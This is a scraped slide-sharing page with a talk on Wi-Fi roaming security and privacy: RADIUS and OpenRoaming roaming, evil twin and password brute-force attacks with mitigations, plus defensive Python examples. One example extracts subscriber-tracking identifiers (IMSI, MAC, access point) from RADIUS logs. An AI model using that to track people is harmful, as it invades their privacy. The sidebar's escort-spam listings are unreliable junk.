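Calling-Station-Id = "aa2b0b553528"
Called-Station-Id = "6026efcdcdc4"
Framed-IP-Address = 172.16.145.111
Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448"
Aruba-Location-Id = "rs-aruba-ap-1"
Aruba-User-Vlan = 145
"""

# 3GPP permanent identity: a leading method digit (1 = EAP-SIM, 0 = EAP-AKA,
# 6 = EAP-AKA') followed by the 15 digit IMSI and the operator realm.
IMSI_NAI_RE = re.compile(
    r"^([016])(\d{15})@wlan\.mnc(\d{3})\.mcc(\d{3})\.3gppnetwork\.org$", re.I)
EAP_METHOD = {"1": "EAP-SIM", "0": "EAP-AKA", "6": "EAP-AKA'"}


def parse_attrs(dump):
    attrs = []
    for line in dump.splitlines():
        if " = " not in line:
            continue
        name, _, value = line.partition(" = ")
        attrs.append((name.strip(), value.strip().strip('"')))
    return attrs


def normalise_mac(text):
    digits = re.sub(r"[^0-9a-fA-F]", "", text)
    return digits.lower() if len(digits) == 12 else None


def is_locally_administered(mac):
    """Bit 1 of the first octet set means a locally administered address,
    which is what OS MAC randomisation produces; clear means a burnt-in,
    globally unique address."""
    return bool(int(mac[:2], 16) & 0x02)


def identifiers(attrs):
    """(attribute, what it reveals) for every tracking relevant attribute."""
    found = []
    for name, value in attrs:
        if name == "User-Name":
            m = IMSI_NAI_RE.match(value)
            if m:
                found.append((name, "%s permanent identity, IMSI %s (MCC %s, MNC %s)"
                              % (EAP_METHOD[m.group(1)], m.group(2), m.group(4), m.group(3))))
            else:
                found.append((name, "user identity %s" % value))
        elif name == "Calling-Station-Id":
            mac = normalise_mac(value)
            if mac:
                kind = "randomised" if is_locally_administered(mac) else "burnt-in, globally unique"
                found.append((name, "client MAC %s (%s)" % (mac, kind)))
        elif name == "Called-Station-Id":
            found.append((name, "AP BSSID: places the session at one access point"))
        elif name == "Framed-IP-Address":
            found.append((name, "IP address: links RADIUS to DHCP, flow and web logs"))
        elif name.endswith("Session-Id"):
            found.append((name, "session id built from client and AP MACs"))
        elif "Location" in name:
            found.append((name, "vendor location attribute %s" % value))
    return found


if __name__ == "__main__":
    for attr, meaning in identifiers(parse_attrs(SAMPLE_ACCT_START)):
        print("%-20s %s" % (attr, meaning))
```

Run on the slides’ own dump this reports that the client did randomise its MAC (aa:2b:… has the locally administered bit set) and that it made no difference: the permanent IMSI in User-Name and the AP BSSID in Called-Station-Id still identify the subscriber and the place, which is the slides’ point about accounting.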
How to protect privacy?
● Use MAC address randomisation
● Use an anonymous outer identity in Wi-Fi configurations
● Don’t send RADIUS accounting if it is not required (eduroam recommendation)
● Use RadSec (RADIUS over TLS, RFC 6614) to protect both authentication and accounting on the wire (OpenRoaming requirement); note that this is hop by hop, each RADIUS proxy still sees the attributes
● Use EAP-TLS with TLSv1.3 support for client certificate authentication (in TLS 1.3 the client certificate is sent encrypted)
● Use IMSI Privacy Protection supporting clients, server software and operator
Adding RadSec to the roam.fi roaming federation
(Diagram: the roam.fi federation as before. Radiator Auth.Fi, Enterprise Wi-Fi as a service, and the redundant roam.fi RADIUS service in public cloud; Tampere University RADIUS and other customers, e.g. City of Seinäjoki and Seinäjoki education, still connect via plain RADIUS. Two more instances were added for inbound RadSec for roam.fi organisations, and separate instances handle inbound and outbound OpenRoaming.)
Thank you, any questions?
Slideshare (personal): slideshare.net/khuhtanen/
Radiator Software webinars: radiatorsoftware.com/webinars/
Mastodon (personal): @khuhtanen@infosec.exchange
Twitter (personal): @khuhtanen
Twitter (company): @RadiatorAAA
Radiator Software: radiatorsoftware.com

Beyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoaming
 
Routing host certificates in eduroam/govroam
Routing host certificates in eduroam/govroamRouting host certificates in eduroam/govroam
Routing host certificates in eduroam/govroam
 
Cooperative labs, testbeds and networks
Cooperative labs, testbeds and networksCooperative labs, testbeds and networks
Cooperative labs, testbeds and networks
 
Privacy and traceability in Wi-Fi networks
Privacy and traceability in Wi-Fi networksPrivacy and traceability in Wi-Fi networks
Privacy and traceability in Wi-Fi networks
 
EAP-TLS
EAP-TLSEAP-TLS
EAP-TLS
 
TLS and Certificates
TLS and CertificatesTLS and Certificates
TLS and Certificates
 
What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?
 
What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?
 
Building secure, privacy aware, quality Wi-Fi coverage via cooperation
Building secure, privacy aware, quality Wi-Fi coverage via cooperationBuilding secure, privacy aware, quality Wi-Fi coverage via cooperation
Building secure, privacy aware, quality Wi-Fi coverage via cooperation
 
Connecting the Dots: Integrating RADIUS to Network Measurement and Monitoring
Connecting the Dots: Integrating RADIUS to Network Measurement and MonitoringConnecting the Dots: Integrating RADIUS to Network Measurement and Monitoring
Connecting the Dots: Integrating RADIUS to Network Measurement and Monitoring
 
Building city and nationwide Wi-Fi coverage via cooperation
Building city and nationwide Wi-Fi coverage via cooperationBuilding city and nationwide Wi-Fi coverage via cooperation
Building city and nationwide Wi-Fi coverage via cooperation
 
eduroam diagnostics in NTLR, IdPs and SPs
eduroam diagnostics in NTLR, IdPs and SPseduroam diagnostics in NTLR, IdPs and SPs
eduroam diagnostics in NTLR, IdPs and SPs
 
Using NoSQL databases to store RADIUS and Syslog data
Using NoSQL databases to store RADIUS and Syslog dataUsing NoSQL databases to store RADIUS and Syslog data
Using NoSQL databases to store RADIUS and Syslog data
 
Open WiFi or Broken WiFi?
Open WiFi or Broken WiFi?Open WiFi or Broken WiFi?
Open WiFi or Broken WiFi?
 
Cloud Based Identity Management
Cloud Based Identity ManagementCloud Based Identity Management
Cloud Based Identity Management
 
eduroam ennen, nyt ja tulevaisuudessa
eduroam ennen, nyt ja tulevaisuudessaeduroam ennen, nyt ja tulevaisuudessa
eduroam ennen, nyt ja tulevaisuudessa
 

Recently uploaded

Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 

Recently uploaded (20)

Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 

Wi-Fi roaming security and privacy 2023

  • 1. Wi-Fi roaming security and privacy 2023-02-23 Karri Huhtanen
  • 2. Karri Huhtanen
    ● Installed first Linux distribution ~1993 (Softlanding Linux System, didn’t know how to exit emacs or vi)
    ● Have had Internet access since 1993 (but purchased first Internet subscription in 2006)
    ● Have worked with wireless networks, security and roaming since 1997
    ● Was there to connect Finland to eduroam in 2003 (maintained eduroam Finland top-level RADIUS since then)
    ● Founded Arch Red Oy (nowadays Radiator Software Oy) in Tampere University of Technology in 2003 with two colleagues to productise Wi-Fi access control and roaming solutions (e.g. roam.fi)
  • 3. This may not be the Wi-Fi network security presentation you are looking for…
    ● This is a presentation about Wi-Fi roaming security and privacy => e.g. local Wi-Fi network security and radio protocols are covered only briefly
    ● If there is interest I can do a presentation about local Wi-Fi network security as well at some other time / event.
    ● On Slideshare I do have a presentation about that topic: https://www.slideshare.net/khuhtanen/security-issues-in-radius-based-wifi-aaa and more: https://www.slideshare.net/khuhtanen/presentations
    ● And I am looking for a replacement for Slideshare, because Scribd has reduced the usability of the service with forced advertisements etc.
  • 4. So let’s start with Wi-Fi network security … :) with slides about Wi-Fi roaming basics as well
  • 5. How does WPA2/3 Enterprise AAA work? (diagram: WPA2/3 Enterprise Authentication)
    Components: Network Access Server (NAS), e.g. Wi-Fi controller or Wi-Fi AP; RADIUS protocol; RADIUS AAA server software
    User credentials (username+password, certificate, SIM card) travel within the encrypted EAP envelope.
    ● EAP-PWD: EAP method based on elliptic curves, real identity shown
    ● EAP-TTLS, EAP-PEAP: TLS secured “envelope”, outer identity can be anonymous or real identity
    ● EAP-TLS: certificate based EAP method, certificate details can be seen
    ● EAP-SIM, EAP-AKA(‘): SIM card based EAP method, temporary identities etc.
  • 6. So where does WPA2/3 Enterprise AAA fail?
    ● Very rarely with technology
    ● Sometimes with network and security design
    ● Often with misconfiguration or lack of configuration provisioning
    ● Most commonly with end users and manual device configuration
  • 7. What is the difference between WPA2 and WPA3?
    ● WPA3 mandates Protected Management Frames (PMF); WPA2 has those, but by default does not mandate their use
    ● WPA3 has additional stronger encryption methods and improvements in the key exchange (SAE instead of PSK)
    ● WPA2 will still be around and can be secured more by mandating PMF and disabling WPA1 and TKIP compatibility
  • 8. How does Wi-Fi RADIUS roaming work? (diagram: Visited organisation (VO) Wi-Fi network, NAS, roaming visitor’s device with outer identity anonymous@example.com and inner identity realusername@example.com)
    1) Roaming visitor (anonymous@example.com) wants to join this Wi-Fi network
    2) NAS forwards the request to the VO RADIUS server. As example.com is not a VO realm, the RADIUS server proxies the request to its default server
    3) Federation Top Level RADIUS server knows that realm example.com is handled by the example.com RADIUS server and proxies the request to it
    4) Home organisation (example.com) RADIUS server and the example.com user device negotiate and arrange a TLS secured tunnel for authentication. Authentication happens between the example.com user device and the example.com RADIUS server using the infrastructure in between.
    5) Home organisation RADIUS server makes the OK or NOT OK decision based on the authentication and returns the access decision response via the same infrastructure route
    6) NAS lets the example.com user device connect (or not) to the VO Wi-Fi network based on the proxied RADIUS response
  • 9. RADIUS based roaming federation (diagram)
    ● Redundant roam.fi RADIUS service in public cloud: default RADIUS route for all roam.fi members, but no own default RADIUS route
    ● Connected via RADIUS: Radiator Auth.Fi (Enterprise Wi-Fi as a service), Tampere University RADIUS, other customers connecting via RADIUS, e.g. City of Seinäjoki, Seinäjoki education etc.
  • 10. How does OpenRoaming work? (https://wballiance.com/openroaming/) (diagram)
    ● Access networks: Passpoint (Hotspot 2.0) compatible Wi-Fi network, SSID: *any*, RCOI (Settled): BA-A2-D0-xx-xx or RCOI (Settlement-Free): 5A-03-BA-xx-xx (three such networks in the diagram, with users user@example.com, user@example.net, user2@example.com and user@example.org)
    ● RADIUS capable Wi-Fi controller or example.net’s own RADIUS server; OpenRoaming Settled or Settlement-Free Access Service Provider; static Radius over TLS (RadSec, RFC 6614) connection between them
    ● DNS discovery via Global Public DNS: NAPTR aaa+auth:radius.tls.tcp <realm> -> SRV <NAPTR result> -> Name lookup <SRV result>
    ● Dynamic RadSec connections to the example.com IdP (example.com RADIUS server), to the example.org IdP (example.org RADIUS server) and to example.net’s IdP service provider
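The DNS discovery chain on this slide (NAPTR with service aaa+auth:radius.tls.tcp, then SRV, then a name lookup) walked through offline, as an added example that is not part of the deck or of any OpenRoaming implementation. All zone data, host names and addresses are constructed; the realm check in front of the lookup is a defensive choice, since the realm comes out of the peer's outer identity:

```python
"""Offline walk of the OpenRoaming dynamic discovery chain shown on the slide:
realm -> NAPTR (service aaa+auth:radius.tls.tcp) -> SRV -> host address.
All DNS records here are constructed test data, not real OpenRoaming zones."""
import re
from typing import NamedTuple


class Naptr(NamedTuple):
    order: int
    preference: int
    flags: str
    service: str
    replacement: str


class Srv(NamedTuple):
    priority: int
    weight: int
    port: int
    target: str


# Constructed zone data keyed by (owner name, record type).
ZONE = {
    ("example.com", "NAPTR"): [
        Naptr(100, 20, "S", "aaa+auth:radius.tls.tcp", "_radiustls-backup._tcp.example.com"),
        Naptr(100, 10, "S", "aaa+auth:radius.tls.tcp", "_radiustls._tcp.example.com"),
        Naptr(50, 10, "S", "aaa+auth:radius.udp", "_radius._udp.example.com"),  # not RadSec: ignored
    ],
    ("_radiustls._tcp.example.com", "SRV"): [Srv(10, 0, 2083, "radsec1.example.com")],
    ("_radiustls-backup._tcp.example.com", "SRV"): [Srv(10, 0, 2083, "radsec2.example.com")],
    ("radsec1.example.com", "A"): ["192.0.2.10"],
    ("radsec2.example.com", "A"): ["192.0.2.20"],
}

RADSEC_SERVICE = "aaa+auth:radius.tls.tcp"
# The realm is taken from the peer's outer identity (User-Name), i.e. from
# untrusted input, so it is checked against DNS label syntax before it is
# ever used as a query name.
_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def valid_realm(realm: str) -> bool:
    if not realm or len(realm) > 253:
        return False
    return all(_LABEL.match(label) for label in realm.lower().split("."))


def lookup(name: str, rtype: str, zone=ZONE):
    """Stand-in for a resolver call; returns [] when the name does not exist."""
    return list(zone.get((name.lower().rstrip("."), rtype), []))


def discover_radsec(realm: str, zone=ZONE):
    """Return [(host, ip, port), ...] in the order a proxy should try them.

    Only NAPTR records advertising RadSec ("S" flag, aaa+auth:radius.tls.tcp)
    are considered. Following RFC 3403, the lowest NAPTR order that yields a
    server wins; within that order, lower preference goes first, and SRV
    records are tried by priority and then by descending weight.
    """
    if not valid_realm(realm):
        return []
    candidates = [n for n in lookup(realm, "NAPTR", zone)
                  if n.service == RADSEC_SERVICE and "S" in n.flags.upper()]
    for order in sorted({n.order for n in candidates}):
        servers = []
        for n in sorted((c for c in candidates if c.order == order), key=lambda c: c.preference):
            for s in sorted(lookup(n.replacement, "SRV", zone), key=lambda s: (s.priority, -s.weight)):
                for ip in lookup(s.target, "A", zone):
                    servers.append((s.target.lower(), ip, s.port))
        if servers:
            return servers
    return []


if __name__ == "__main__":
    for realm in ("example.com", "Example.COM", "unknown.example", "bad realm;"):
        print(realm, "->", discover_radsec(realm))
```

An unknown realm and a malformed realm both come back empty, which is the point of validating before querying: a server that forwards whatever string follows the "@" straight into a DNS query has handed the peer control over what it resolves.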
  • 12. Evil Twin Man-in-the-Middle (MitM) attack (diagram: attacker sets up an Evil Twin Wi-Fi network; NAS; victim’s device with outer identity anonymous@example.com and inner identity realusername@example.com; Federation Top Level RADIUS server)
    1) Evil twin sets up a Wi-Fi network with the same Wi-Fi network name (SSID) or Roaming Consortium Organisation Identifier (RCOI) as the real roaming network provider. Victim’s device tries automatically to join this network.
    2) Victim’s device tries to negotiate a TLS connection over RADIUS with the home organisation RADIUS server, but the evil twin intercepts and tries to impersonate the home organisation RADIUS server. Federation RADIUS connectivity is not needed. The evil twin just needs to be able to terminate the TLS tunnel for RADIUS authentication. There have been accidental and ignorant evil twin RADIUS server configurations in organisations.
    3) If victim’s device does not have a proper Wi-Fi network configuration, or the capabilities, to check the RADIUS server details, the device may send the credentials (username, password, password hash) to the attacker’s RADIUS server.
  • 13. Evil Twin attack mitigation
    ● Proper Wi-Fi configuration profiles (eduroam-cat/geteduroam.app, Windows policies, Apple Configurator)
    ● Using a Private CA signed RADIUS server certificate instead of a well-known or system CA (Android) signed one => impersonation with another certificate signed by the same CA does not work (some devices cannot check the certificate CN or SubjectAltNames)
    ● Using client-certificate authentication (EAP-TLS) or EAP-PWD => no credentials sent, but identity may still be sent
    ● Rogue access point detection and isolation features in Wi-Fi controllers
    ● Using separate network credentials (different username and password) or Multi-Factor Authentication => lost credentials are less valuable or do not work
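What "proper Wi-Fi configuration profile" means in concrete settings, as an added example that is not from the deck: a small lint over a wpa_supplicant-style network block that reports the evil twin weaknesses the slide lists (no pinned CA, no server name match, real username as outer identity). Both profiles are constructed; the key names follow wpa_supplicant.conf, and the "system CA bundle" path heuristic is an assumption of this example:

```python
"""Check a wpa_supplicant-style network block for the evil twin mitigations
listed on the slide: a pinned (private) CA, a server name match and an
anonymous outer identity. The two profiles are constructed examples and the
key names follow wpa_supplicant.conf; other supplicants use different names."""
import re

# Constructed: a profile typed by hand. Nothing ties the TLS tunnel to the
# home organisation's RADIUS server, so any server can terminate it.
WEAK_PROFILE = """
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="realusername@example.com"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

# Constructed: what a provisioned profile looks like.
HARDENED_PROFILE = """
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="realusername@example.com"
    anonymous_identity="anonymous@example.com"
    password="hunter2"
    ca_cert="/etc/wpa_supplicant/example-com-private-ca.pem"
    domain_match="radius.example.com"
    phase2="auth=MSCHAPV2"
}
"""

_KV = re.compile(r'^\s*([A-Za-z0-9_]+)\s*=\s*"?([^"]*)"?\s*$')
NAME_MATCH_KEYS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")
TUNNELLED = {"PEAP", "TTLS"}   # outer identity plus inner credentials
CERT_ONLY = {"TLS"}            # client certificate, no password involved


def parse_network_block(text: str) -> dict:
    """Return the key/value pairs of the first network={...} block."""
    conf, inside = {}, False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("network={"):
            inside = True
        elif inside and stripped == "}":
            break
        elif inside:
            m = _KV.match(line)
            if m:
                conf[m.group(1)] = m.group(2)
    return conf


def lint_profile(text: str) -> list:
    """Return human-readable findings; an empty list means the checks pass."""
    c = parse_network_block(text)
    eap = c.get("eap", "").upper()
    findings = []
    if c.get("key_mgmt", "").upper() != "WPA-EAP":
        return ["key_mgmt is not WPA-EAP: not an 802.1X/EAP profile, nothing else to check"]
    ca = c.get("ca_cert", "")
    if not ca:
        findings.append("no ca_cert: any server certificate is accepted, so an evil twin can terminate the TLS tunnel")
    elif re.search(r"ca-certificates|ca-bundle", ca):
        # Heuristic (assumption of this example): a system bundle means any
        # public CA can issue a certificate that passes the check.
        findings.append("ca_cert points to a system CA bundle instead of the organisation's private CA")
    if not any(c.get(k) for k in NAME_MATCH_KEYS):
        findings.append("no server name match (domain_match etc.): any certificate from the trusted CA passes")
    if eap in TUNNELLED and not c.get("anonymous_identity"):
        findings.append("no anonymous_identity: the real username travels in the clear as the outer identity")
    if eap in CERT_ONLY and c.get("password"):
        findings.append("password configured for EAP-TLS, which never sends one")
    return findings


if __name__ == "__main__":
    for name, prof in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(name, lint_profile(prof) or ["ok"])
```

The name match matters even with a private CA: the slide's point that "some devices cannot check the certificate CN or SubjectAltNames" is exactly why the private CA is needed, and on devices that can check, both settings together leave the evil twin nothing to present.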
  • 14. Brute force / Denial of Service (DoS) attack (diagram: Visited organisation (VO) Wi-Fi network, NAS, attacker’s device with outer identity anonymous@example.com, inner identity victim@example.com and password: password guess)
    1) Attacker tries to brute force the victim’s password by using the visited organisation’s Wi-Fi network and the roaming infrastructure
    2) example.com RADIUS server tries to authenticate victim@example.com from its authentication backend (Active Directory, SQL, LDAP etc.)
    3) example.com RADIUS server authentication backend responds to all requests, but may also lock the user account for a while or completely (DoS)
    Roaming infrastructure or RADIUS servers do not usually have any rate limiting. The round trip time for a single roaming authentication is usually 1-5 seconds.
  • 15. Brute force / Denial of Service (DoS) mitigation
    ● Rate limiting RADIUS requests in the home organisation RADIUS server
      ○ Can be complex to design, implement and configure depending on the EAP protocol and inner EAP authentication method
      ○ Contributes to Denial of Service attack
    ● Rate limiting requests in the home organisation authentication backend
      ○ Backends may not have support for rate limiting
      ○ Contributes to Denial of Service attack
    ● Rate limiting in the Wi-Fi network controller or Visited Organisation RADIUS server
      ○ Some support exists in the controllers for detecting devices failing multiple authentication requests
    ● Automatic locking and unlocking of the user account
    ● Rate limiting is rarely done because real attacks are equally rare
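One shape the first mitigation can take, as an added example rather than anything from the deck or from any RADIUS product: a sliding-window failure counter in front of the home organisation's backend. Failures are counted per calling station (strict) and per identity (loose), because a per-identity block on its own is the lockout-as-DoS trade-off the slide warns about. The backend, thresholds and MAC addresses are constructed:

```python
"""Sliding-window failure limiter placed in front of the home organisation's
authentication backend. Added illustration with an in-memory constructed
backend; thresholds are example values. Failures are counted per calling
station (strict) and per identity (loose): a per-identity block alone would
let an attacker lock a victim out, which is the DoS trade-off the slide notes."""
import time
from collections import deque


class FailureLimiter:
    def __init__(self, window_s=300, per_station=10, per_identity=50):
        self.window_s = window_s
        self.limits = {"sta": per_station, "id": per_identity}
        self._failures = {}                      # (kind, key) -> deque of timestamps

    def _recent(self, key, now):
        dq = self._failures.setdefault(key, deque())
        while dq and now - dq[0] >= self.window_s:
            dq.popleft()                         # drop events outside the window
        return dq

    def check(self, identity, calling_station, now=None):
        """(allowed, reason); consulted before the backend is asked."""
        now = time.monotonic() if now is None else now
        for kind, value in (("sta", calling_station.lower()), ("id", identity.lower())):
            count = len(self._recent((kind, value), now))
            if count >= self.limits[kind]:
                return False, f"{kind}={value}: {count} failures within {self.window_s}s"
        return True, "ok"

    def record_failure(self, identity, calling_station, now=None):
        now = time.monotonic() if now is None else now
        self._recent(("sta", calling_station.lower()), now).append(now)
        self._recent(("id", identity.lower()), now).append(now)


# Constructed backend standing in for AD/LDAP/SQL.
CONSTRUCTED_USERS = {"victim@example.com": "correct horse battery staple"}


def constructed_backend(identity, password):
    return CONSTRUCTED_USERS.get(identity) == password


def authenticate(limiter, identity, calling_station, password, backend=constructed_backend, now=None):
    """Return (RADIUS reply code, reason) for one inner-identity authentication."""
    allowed, reason = limiter.check(identity, calling_station, now)
    if not allowed:
        # Rejected here: the backend never sees the attempt, so its own
        # lockout counter is not advanced by the attacker.
        return "Access-Reject", reason
    if backend(identity, password):
        return "Access-Accept", "backend accepted"
    limiter.record_failure(identity, calling_station, now)
    return "Access-Reject", "backend rejected"


if __name__ == "__main__":
    lim = FailureLimiter()
    for i in range(12):
        print(i, authenticate(lim, "victim@example.com", "02-00-00-00-00-01", f"guess{i}", now=float(i)))
```

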